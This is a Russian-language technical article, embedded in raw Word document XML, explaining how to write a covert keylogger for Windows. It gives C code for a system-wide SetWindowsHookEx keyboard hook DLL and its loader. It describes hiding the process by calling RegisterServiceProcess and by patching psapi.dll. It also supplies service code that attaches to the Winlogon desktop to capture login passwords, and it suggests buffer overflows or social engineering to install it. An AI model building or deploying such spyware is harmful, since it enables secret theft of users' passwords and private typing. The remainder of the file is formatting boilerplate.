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D1" w:rsidRDefault="000C10D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Style w:val="captionl1"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Реализация keylogging под WIN32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C10D1" w:rsidRDefault="000C10D1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="120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Марк Ермолов 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Одним из самых простых методов съёма информации с персонального компьютера является установка на компьютер пользователя программы, производящей учёт нажатий клавиш. Данный метод можно легко осуществить при физическом доступе на интересующий компьютер. Установить кейлоггер можно также и удаленно, используя ошибки в реализациях сервисов объекта, но мы опустим методы установки в данной статье.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Существует большое количество уже готовых программ-кейлоггеров. Однако во-первых большинство из них уже определяются антивирусными программами, во-вторых, зачастую, их функциональность оставляет желать лучшего, либо они работают крайне нестабильно. Одним из видов программ, осуществляющих съём информации, являются KeyLogger-ы (дословно регистратор клавиш). Они регистрируют все нажатые клавиши на клавиатуре, обрабатывают полученную информацию и сохраняют её в файл. Поскольку закрытая информация (пароли, документы, и т.д.) набирается с клавиатуры, KeyLogger является одним из средств её получения.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операционной системе MSDOS кейлоггер данного вида просто перехватывает прерывание от клавиатуры (int 16h) и нужным образом его обрабатывает. В Win32 все сложнее. Будет уместным описать метод регистрации всех нажатых клавиш с помощью системных ловушек или фильтров (hooks). Этот метод работает как под Win95/98/Millennium так и под WIN NT/2000/XP. В качестве языка программирования для этой задачи стоит выбрать C/C++, а средой разработки MS Visual C++. Ассемблер для этих целей подходит лучше, но писать на Ассемблере в Win32 слишком утомительно и долго.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Win32 API присутствует функция SetWindowsHookEx. Она позволяет определить некоторую (собственную) функцию которая будет срабатывать каждый раз при наступлении некоторого события (получение программой сообщения, нажатия клавиши на клавиатуре, создания окна и т.д.). Полное описание данной функции можно прочитать в MSDN (Microsoft Developer Network Library).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параметр данной функции указывает событие, на которое мы ставим ловушку. В нашем случае - клавиатура - WH_KEYBOARD.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втором месте в обработчике вызова мы должны указать адрес функции, которая будет вызываться каждый раз при наступлении данного события. Вид этой функции (для обработки нажатий клавиш) следующий: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LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam);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где:  code - способ обработки клавиши приложением.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wParam - содержит виртуальный код нажатой клавиши.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lParam - представляет собой 4-x байтовую структуру данных, где в качестве полей выступают её биты. Биты 0-15 определяют сколько раз произошло событие (значение отлично от 1 в случае, если клавиша удерживается некоторое время), биты 16-23 определяют scan-код нажатой (отпущенной) клавиши, а 31-ый бит определяет, была ли клавиша нажата или отпущена.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Параметр code применяется для отсеивания лишних событий. Например, при наборе в MS Word текста "123" наш обработчик получит по паре событий на каждое нажатие клавиши ("112233") При поступлении интересующего нас сообщения сообщения данный параметр равен HC_ACTION.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Поскольку KeyboardProc используется системой, мы должны при описании указать CALLBACK.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для обработки нажатых клавиш мы должны написать свою процедуру KeyboardProc примерно следующим образом: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LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)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{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DWORD IsDown, ScanCode;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IsDown = !(lParam &gt;&gt; 31);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ScanCode = lParam &lt;&lt; 8;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ScanCode &gt;&gt;= 24;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if (IsDown &amp;&amp; code == HC_ACTION)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ProccessDownKey(wParam, (unsigned char)ScanCode);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обрабатываем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return 0;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}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MSDN сказано, что если параметр code &lt; 0, то нужно предать управление следующей ловушке вызовом CallNextHookEx, но на практике можно этого не делать, а просто возвратить из KeyboardProc 0 и все будет работать.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Третий параметр SetWindowsHookEx - дескриптор модуля в котором находится KeyboardProc, а четвертый - идентификатор потока, для которого устанавливается ловушка (0 - для всех потоков в системе). Фильтр может устанавливаться как на один поток одного приложения, так и на все потоки всех приложений. В последнем (наиболее интересном) случае KeyboardProc должна находиться в DLL (Dynamic Link Library). Так сделано из-за особенностей архитектуры Windows, в которой каждый процесс имеет свое адресное пространство. С помощью Visual C++ реализация собственной dll-библиотеки является несложной.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Важным моментом является то, что при запуске каждой новой программы при активном фильтре, Windows создает новую копию всех данных DLL, содержащей KeyboardProc, и динамическая библиотека внедряется в адресное пространство запускаемого процесса. Поэтому все глобальные данные следует хранить следующим образом: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В исходном коде DLL написать следующее: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#pragma data_seg(".SHAREDDATA")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/*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Глобальные данные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Например:*/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static char logFileName[128] = {0}; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Имя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файла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отчета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static int dllsCount; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Число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внедренных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> DLL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// и т.д.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#pragma data_seg()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В .def - файле библиотеки написать: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SECTIONS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.SHAREDDATA Read Write Shared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обработки события от клавиатуры возникает проблема: Как получить символ (например 'A' или 'a', 's' или 'ы'), который действительно вводил пользователь. Для этого можно воспользоваться функциями ToAscii и ToUnicode, которые позволяют по scan-коду и виртуальному коду, а также состоянию клавиатуры определить конкретный символ.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опустим подробное описание механизма загрузки DLL, и получения адреса функции, а приведём пример непосредственного использования нашей библиотеки.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Пусть библиотека, содержащая необходимую нам функцию KeyboardProc, называется hooklib.dll.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#include  &lt;windows.h&gt;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int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)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{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HHOOK hHook;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HINSTANCE hLib;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HOOKPROC pKeybrdProc;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hLib = LoadLibrary("hooklib.dll");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if (hLib == NULL)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return 0; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ошибка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pKeybrdProc = reinterpret_cast&lt;HOOKPROC&gt;(GetProcAddress(hLib, "KeyboardProc"));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if (pKeybrdProc == NULL) {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FreeLibrary(hLib); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ошибка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return 0;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}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hHook = SetWindowsHookEx(WH_KEYBOARD, pKeybrdProc, hLib, 0);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if (hHook == NULL) {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FreeLibrary(hLib); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ошибка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return 0;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}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//....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//GetMessage и т. д. пока не поступит WM_QUERYENDSESSION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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//....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UnhookWindowsHookEx(hHook);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FreeLibrary(hLib);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return 0;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}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Примечательно, что данный метод работает и в Windows NT/2000/XP, поскольку функция SetWindowsHookEx не требует никаких привилегий (например SeDebugPrivilege) и будет работать даже под обычным пользователем. Это можно воспринимать как слабину в системе безопасности NT/2000/XP, поскольку всё же происходит внедрение в адресное пространство процесса. (Вспомним атаку GetAdmin, где с помощью внедрения в процесс, в NT без SP3 можно было получить права администратора под пользователем guest!!!).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Более подробную информацию по фильтрам вы можете найти в MSDN, в статье "Win32 Hooks".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Важным моментом любой программы такого рода является маскировка.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Win95/98/Millennium программу можно скрыть из списка задач функцией RegisterServiceProcess, после этого она не будет видна в списке задач taskman'a, показываемом по нажатии "Ctrl + Alt + Del". Однако любой менеджер процессов (к примеру, SysInfo) всё равно покажет нашу программу, поэтому при написании нужно создавать и информацию о версии. Так будет менее заметней. SysInfo также определяет все установленные в системе ловушки. Функцию RegisterServiceProcess просто так вызвать не удастся, поскольку она не объявленна в windows.h (winuser.h и т.д.). Её нужно вызывать напрямую из KERNEL32.DLL. Она имеет следующий прототип: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DWORD RegisterServiceProcess(DWORD dwProcessId, DWORD dwType);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где dwProcessId - Id процесса(0 - вызывающий), а dwType = 1, если делаем процесс сервисом, и 0, если убираем сервисные свойства.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Решить задачу маскировки в системах NT/2000/XP куда сложней. Одним из способов можно считать подмену psapi.dll из WINNT\system32 таким образом, чтобы в записи для функции EnumProcesses в таблице экспорта этой dll, точка входа (entry point) указывала не на настоящую реализацию этой функции, на некоторую собственную, с последующим вызовом оригинала. Однако этот механизм не будет работать для тех приложений, которые 'жестко' связаны с psapi.dll с помощью утилиты bind.exe.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Точки входа для каждой экспортируемой функции из любой dll можно посмотреть с помощью утилиты depends входящий в поставку Platform SDK.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Также считаю уместным рассказать в данной статье, как сделать кейлоггер для NT/2000/XP так, чтобы он мог получать информацию (имя пользователя и пароль), которая набирается с клавиатуры при входе пользователя в систему. Данная задача осложняется двумя факторами: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Система отображает приглашение на вход (нажмите Ctrl+Alt+Del и т.д.) до запуска любого пользовательского процесса. То есть, если ваша программа-шпион запускается автоматически или из системной папки Startup или из раздела реестра Run или из некоторых системных ini-файлов, то она не сможет получить информацию, о которой идет речь, просто потому, что ее запуск произойдет уже после того, как пользователь вошел в систему. При попытке завершить сеанс работы и войти под другим пользователем, ваша программа так же будет завершена и запушена после регистрации пользователя в системе.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Окно ввода пароля и входного имени (также как и окно приглашения) защищено отдельным механизмом windows, называемым 'рабочий стол' (Desktop - опять же, смотрите MSDN) и процессы, запушенные из-под других рабочих столов, физически не имеют доступа к этим окнам. (даже функция FindWindow их не найдет). Таким образом, и фильтр, установленный функцией SetWindowsHookEx, не будет срабатывать на действия в интересующих нас окнах.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решения этих проблем предлагаю следующий механизм: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Во-первых, приложение, устанавливающее фильтр клавиш, должно быть оформлено в виде сервиса Win32. (Как сделать сервис можно прочитать в MSDN - глава "Services" раздела "Platform SDK: DLLs, Processes and Threads".)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Во-вторых, сервис должен быть зарегистрирован как запускаемый автоматически (SERVICE_AUTO_START - смотрите описание функции CreateService); ну и много же прав вам понадобиться, что бы зарегистрировать сервис ;-). Ну ничего, всегда найдутся ошибки переполнения буфера и т.д. В конце - концов, можно попытать счастье в социальной инженерии.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наконец, самое главное: Имя рабочего стола c окном ввода пароля - "Winlogon" и он находится в интерактивной 'оконной станции' (window station) c именем "Winsta0". Таким образом, чтобы процесс (точнее его поток) мог попасть в данный рабочий стол и установить там ловушку нужно воспользоваться функциями Win32 API OpenWindowStation, SetProcessWindowStation, OpenDesktop и SetThreadDesktop. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(c</w:t>
      </w:r>
      <w:r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Главу</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Interactive Services" </w:t>
      </w:r>
      <w:r>
        <w:rPr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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MSDN). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если эти функции вызывать из-под сервиса, запускаемого под System - стандартное поведение после регистрации с помощью CreateService с предпоследним параметром равным NULL, то прав хватит сполна и для вызова этих функций и для установки ловушки так, чтобы она обрабатывала интересующие нас окна процесса Winlogon.exe. В качестве параметров, которые обозначают имена этих объектов (рабочий стол, оконная станция), нужно задать приведенные выше значения. Механизм подключения к рабочему столу должен предшествовать вызову функции SetWindowsHookEx. Примечание: не забудьте добавить отдельный поток на пользовательский рабочий стол - "default" из "Winsta0", иначе ловушка не сможет регистрировать действия пользователя после входа в систему. Также хочу отметить, что для не интерактивных сервисов системой создается отдельная оконная станция и рабочий стол, в котором они и запускаются. То есть, без подключения к некоторому реальному рабочему столу, вызывать функцию SetWindowsHookEx из сервиса не имеет смысла.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Приведу небольшой пример реализации сервиса и подключения к рабочему столу. В данном примере я опустил всю обработку ошибок.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#include &lt;windows.h&gt;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void WINAPI MyServiceStart(DWORD, LPTSTR *);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void WINAPI MyServiceCtrlHandler(DWORD);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void ServiceWorkFunction();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SERVICE_STATUS_HANDLE MyServiceStatusHandle;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int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)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{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SERVICE_TABLE_ENTRY DispatchTable[] = {{"MyService", MyServiceStart},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 xml:space="preserve">{NULL, NULL}};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//Вызываем точку входа сервиса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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>StartServiceCtrlDispatcher(DispatchTable);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}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void WINAPI MyServiceStart(DWORD, LPTSTR *)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{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SERVICE_STATUS MyServiceStatus = {0};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MyServiceStatus.dwServiceType = SERVICE_WIN32;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MyServiceStatus.dwCurrentState = SERVICE_RUNNING;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//Регистрируем обработчик событий сервиса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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MyServiceStatusHandle = RegisterServiceCtrlHandler("MyService",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MyServiceCtrlHandler);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SetServiceStatus(MyServiceStatusHandle,  &amp;MyServiceStatus);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ServiceWorkFunction();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}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void WINAPI MyServiceCtrlHandler(DWORD)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{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SERVICE_STATUS MyServiceStatus = {0};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MyServiceStatus.dwServiceType = SERVICE_WIN32;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MyServiceStatus.dwCurrentState = SERVICE_RUNNING;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SetServiceStatus(MyServiceStatusHandle,  &amp;MyServiceStatus);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}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void ServiceWorkFunction()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{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HWINSTA hWS;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HDESK hDT;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//Подключаемся к оконной станции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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hWS = OpenWindowStation("Winsta0", FALSE, GENERIC_ALL);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SetProcessWindowStation(hWS);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//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подключаемся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рабочему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столу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hDT = OpenDesktop("Winlogon", 0, FALSE, GENERIC_ALL);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SetThreadDesktop(hDT);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 //SetWindowsHookEx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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.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}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Вопросы присылайте на e-mail:  http://bugtraq.ru/library/programming/ermolov_mark@mail.ru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P.S.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Всем желающим создавать подобные программы хочу порекомендовать несколько замечательных книг: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C10D1" w:rsidRDefault="000C10D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"Внутреннее устройство Windows 2000", Д. Соломон, М. Руссинович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"Программирование серверных приложений для Windows 2000", Дж. Рихтер, Дж. Кларк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"Windows для профессионалов", Дж. Рихтер </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C10D1" w:rsidRDefault="000C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также утилиты procexp.exe и winobj.exe от  sysinternals. </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="000C10D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46D9A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB12AEC4"/>
    <w:lvl w:ilvl="0" w:tplc="4A527E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1446A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FB4D1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68E17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B7051E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86A9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D0231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C6BC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5104C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5F36E9B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FF09D8E"/>
    <w:lvl w:ilvl="0" w:tplc="F6EC5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0806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66A8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8C8C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00A1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9CB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829D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A403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9C73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415E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="529A448E"/>
    <w:lvl w:ilvl="0" w:tplc="7A5A5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54C3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72290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0C22E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9CAC0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06C19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86E8C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F48FA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AF01A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87E7563"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5FA23882"/>
    <w:lvl w:ilvl="0" w:tplc="38D0F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4AD1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F8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F896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D8E9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0ADA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0457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8058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8CF2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A61B7D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9314FD94"/>
    <w:lvl w:ilvl="0" w:tplc="CEF4EE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D44E7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5CE6E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7E8B0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D1629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F382E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8E6FE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B34B3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DA61E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D4250F0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A05EC270"/>
    <w:lvl w:ilvl="0" w:tplc="E3942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5251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B2E3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E0C6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6280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64C7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4FB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D0ED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483C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A504E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A46DD14"/>
    <w:lvl w:ilvl="0" w:tplc="E48451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D04C3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B4261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8549B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56C71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A3EDA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5C633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9D88B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D346E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23A6F9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5BA8C5B6"/>
    <w:lvl w:ilvl="0" w:tplc="542ED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4E8FC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72AB1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AE4E3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38D1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92038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7DCD6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A021D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B4CA2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2630FB3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF7C448E"/>
    <w:lvl w:ilvl="0" w:tplc="735AC3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AD0B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7207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22029C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D86E0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B56CB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6BA31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D2A6D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5183B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3C822D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A8C6F30"/>
    <w:lvl w:ilvl="0" w:tplc="F536B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C82E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39237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3ECDD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39A17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876CB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FACE5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60410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E5CBE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155E68F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76A40514"/>
    <w:lvl w:ilvl="0" w:tplc="1E34F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35A32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3764F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7BAA4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58EDA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872CD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F76A0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086D7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C809D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18D269E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="113CA488"/>
    <w:lvl w:ilvl="0" w:tplc="859C2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5618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CA6B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8A59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2E3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8A2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6EEA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0CDC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207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BD00FA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4600F176"/>
    <w:lvl w:ilvl="0" w:tplc="BF4E8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300F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74B6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1E27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4EB5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24A2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1630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1D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8A16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C805CB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BCBA9EA4"/>
    <w:lvl w:ilvl="0" w:tplc="A9E43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8B7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500F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B45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84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5C1A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D082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A01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6251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B42568"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="767CE52C"/>
    <w:lvl w:ilvl="0" w:tplc="7EAA9F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BCAA2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86607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EC677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7DA58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512B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0501D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3B818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F2246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3646123"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9864BF28"/>
    <w:lvl w:ilvl="0" w:tplc="D4741E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C8A9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3251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8675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8D6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5007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E68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20E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3EFA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5D2A3A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B6E46B8"/>
    <w:lvl w:ilvl="0" w:tplc="6DFAAB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D84A2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6AE4A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46675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41046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2B2F9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23A2B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8E097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7C658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28E936A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="066CC476"/>
    <w:lvl w:ilvl="0" w:tplc="6680A7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5561D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7C33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40B0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9CBE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D021C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6B090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D14F4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7C654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2C3821EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B7CBB54"/>
    <w:lvl w:ilvl="0" w:tplc="021E8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D307F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8DE0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B18D0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B72CC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6609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F3265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D9E7E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E92E5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2D357CBA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5AA4DFB2"/>
    <w:lvl w:ilvl="0" w:tplc="368AB0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7B874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33E0A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B36C2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38A86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C668D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2F6AD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BB22C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53003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2D9A3146"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15385648"/>
    <w:lvl w:ilvl="0" w:tplc="8EB4F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142D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CE94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4E8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44DF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CEA5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B650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C014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281D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DDC19B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1EE6C7D2"/>
    <w:lvl w:ilvl="0" w:tplc="69901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90FD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160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3E80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B659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1002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CA97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22AF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6C0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DE27E9C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0CBE55A8"/>
    <w:lvl w:ilvl="0" w:tplc="8AB61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DAD4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D6FF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78A4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EFC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FC43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F43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168E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3A4B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F5E6AC1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A0C522C"/>
    <w:lvl w:ilvl="0" w:tplc="FC5E4F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D0E6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EF882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888A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99453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A24A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29CD0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F6E15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962BC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2FA2165E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="86722852"/>
    <w:lvl w:ilvl="0" w:tplc="19C2AC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7A8B5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17211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D5038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F20DAA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E1097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A14BA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824E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C70B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31901947"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FAD460CE"/>
    <w:lvl w:ilvl="0" w:tplc="37F059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A069B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41287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B92E9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F3696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2864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0F659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8F8B4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E3640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35746906"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F506632"/>
    <w:lvl w:ilvl="0" w:tplc="FEA81A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954F1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FC633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70492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77600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93890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58A4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8C419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D7C3B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375C1613"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="252A09F0"/>
    <w:lvl w:ilvl="0" w:tplc="79763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56C9D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52A39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49061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18A38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F0AAA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A685B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B5829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1DAC8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3E1C77E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A69AE466"/>
    <w:lvl w:ilvl="0" w:tplc="D44E6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38C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3619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0A52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F24E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78AE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6601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D8EC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4448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0A95FC9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D22EAE7E"/>
    <w:lvl w:ilvl="0" w:tplc="AB042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98637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61291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80439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B0A82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CB888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D260F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3C27B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03407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40ED784A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E884ABE8"/>
    <w:lvl w:ilvl="0" w:tplc="85C0A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07841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F2A29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30CA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6EAFDE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60C23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B82C8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EE4EC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9385F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43A13D42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A41C4802"/>
    <w:lvl w:ilvl="0" w:tplc="C1E26E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FC9C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62F6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FC86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C93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4231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6C0C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929E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10B3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0CC78B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DFE2A620"/>
    <w:lvl w:ilvl="0" w:tplc="CB806E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BE8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2C6DF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20409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404D2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822B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C467F2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23450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7C065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1C95C00"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8F5639EC"/>
    <w:lvl w:ilvl="0" w:tplc="694889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C403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66EE4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ED69B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DF2FF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F6E05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240FE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472F2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A5EA8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537749BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97CE23E6"/>
    <w:lvl w:ilvl="0" w:tplc="A482A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1EE1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9E4EE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38010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D2823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42433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04CAE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DB2FE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12C3C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56E13363"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A461FD6"/>
    <w:lvl w:ilvl="0" w:tplc="D38E8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B045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F0AE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4EB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165E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2837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D644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0667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C0A4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B5B6930"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45F2D284"/>
    <w:lvl w:ilvl="0" w:tplc="CC0EBE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7EE4A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A0E03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1E61F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1B8F3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2C22B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CEEE5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D2A90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F542F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5CAF7731"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8145028"/>
    <w:lvl w:ilvl="0" w:tplc="63346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7AAD7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F0611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62ED3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71642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B8ED6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89AF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71A69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39459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619E427F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87C4DB26"/>
    <w:lvl w:ilvl="0" w:tplc="C02023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44A97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ADCA1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F18D7D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38CEC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C3E6F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FFCA6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72AFB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52C5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23522A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0F0B434"/>
    <w:lvl w:ilvl="0" w:tplc="A29CD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2CA13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C4054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BECEA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27C1B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7861C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EEAE7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48E9F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F05B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64CC28B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE6AE7C8"/>
    <w:lvl w:ilvl="0" w:tplc="69DCA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CA7A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E617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2C50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025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1E01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50ED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E9C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B267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684145E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7343026"/>
    <w:lvl w:ilvl="0" w:tplc="989C3C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68849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3DE5C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FAAAD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32F3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21A94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EBAEB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0A6AC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836CA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7012207D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="461E6B0C"/>
    <w:lvl w:ilvl="0" w:tplc="1F1CBC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2A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630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E4F6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FC8D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A0B4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8292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3EF6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A6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2DE7BE7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42B0C312"/>
    <w:lvl w:ilvl="0" w:tplc="0FE28F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43AED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CC40B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54CD2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188CE4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3CEC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96A3C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79AE2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10EA9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6B85482"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A192EB1E"/>
    <w:lvl w:ilvl="0" w:tplc="69BCC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A432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00E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8C5B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CAC3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128B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90B0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057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705C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4"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="7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C54"/>
    <w:rsid w:val="000C10D1"/>
    <w:rsid w:val="002366F7"/>
    <w:rsid w:val="008326CC"/>
    <w:rsid w:val="0085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5BC9D5-2A93-42FE-BBD1-2495B4E8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30"/>
      <w:szCs w:val="30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auto"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="captionl1">
    <w:name w:val="captionl1"/>
